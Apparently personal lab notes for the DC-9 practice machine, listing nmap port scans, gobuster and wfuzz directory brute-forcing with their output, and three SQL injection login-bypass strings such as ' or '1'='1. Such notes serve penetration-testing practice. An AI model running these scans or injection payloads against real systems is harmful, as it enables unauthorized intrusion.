DC-9

Scanning: - nmap -sn 192.168.1.0/24 - to identify live system in network

looking for open ports (without details)

export IP=192.168.221.209

nmap -p- -A $IP

nmap -p- -sC -sV -T4 -O -v $IP |tee nmap

Enum:

always choose http over ssh

export URL=http://192.168.221.209/

gobuster dir -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u $URL |tee gobuster

Nothing interesting either we only have login fields on manage page and search field on search pages to play with!

wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt --hc 404 http://192.168.116.209:80/FUZZ

=====================================================================

ID Response Lines Word Chars Payload

=====================================================================

000000015: 301 9 L 28 W 316 Ch "css"

000000004: 301 9 L 28 W 321 Ch "includes"

000004227: 403 9 L 28 W 280 Ch "server-status"

000004255: 200 42 L 79 W 917 Ch "http://192.168.190.209:80/"

000030014: 200 42 L 79 W 917 Ch "http://192.168.190.209:80/"

wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-files.txt --hc 404 http://192.168.190.209:80/FUZZ

=====================================================================

ID Response Lines Word Chars Payload

=====================================================================

000000001: 200 42 L 79 W 917 Ch "index.php"

000000002: 200 49 L 88 W 1091 Ch "search.php"

000000072: 200 0 L 0 W 0 Ch "config.php"

000000156: 302 0 L 0 W 0 Ch "logout.php"

000000379: 200 42 L 79 W 917 Ch "."

000000586: 200 54 L 86 W 1056 Ch "results.php"

000001031: 200 50 L 87 W 1210 Ch "manage.php"

000001204: 200 41 L 234 W 2961 Ch "display.php"

000001233: 302 0 L 0 W 0 Ch "welcome.php"

000001904: 302 0 L 0 W 0 Ch "session.php"

SQL Injection

' or '1'='1

' or ''='

' or 1 or '

Last updated 10 months ago

Was this helpful?